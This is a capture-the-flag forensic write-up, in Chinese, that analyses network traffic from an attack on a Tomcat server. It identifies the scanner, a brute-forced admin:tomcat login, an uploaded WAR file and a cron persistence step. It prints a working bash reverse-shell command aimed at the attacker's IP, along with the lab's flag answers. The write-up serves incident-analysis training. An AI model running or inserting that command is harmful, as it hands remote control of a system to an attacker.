第六章-流量特征分析-常见攻击事件Tomcat
0x00 环境分析
|
|
0x01
1、在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者IP
过滤一下http
请求,在按照Source
排序http.request==1
可以看到14.0.0.120
这个ip请求次数很多,而且很多都是可疑请求,
flag{14.0.0.120}
2、找到攻击者IP后请通过技术手段确定其所在地址
ip138
查询ip
地址
flag{guangzhou}
3、哪一个端口提供对web服务器管理面板的访问?
可以看到黑客一直在爆破8080
端口
所以8080
端口便是tomcat
的管理面板
4、经过前面对攻击者行为的分析后,攻击者运用的工具是?
随便点了几个黑客扫描的请求,发现其User-Agent
中存在请求头
flag{gobuster}
5、攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码?
黑客在爆破tomcat
的管理面板,这里过滤请求
http.request.uri=="/manager/html" || http.response == 1
再按照时间排序
YWRtaW46dG9tY2F0
解密得到admin:tomcat
flag{admin-tomcat}
6、攻击者登录成功后,先要建立反弹shell,请分析流量提交恶意文件的名称?
看到了请求/upload
目录
发送了一个JXQOZY.war
文件
flag{JXQOZY.war}
8、攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息?
题目描述是维权,所以搜索一下关键信息/bin
tcp contains "/bin"
可以看到是定时任务进行了权限维持
flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}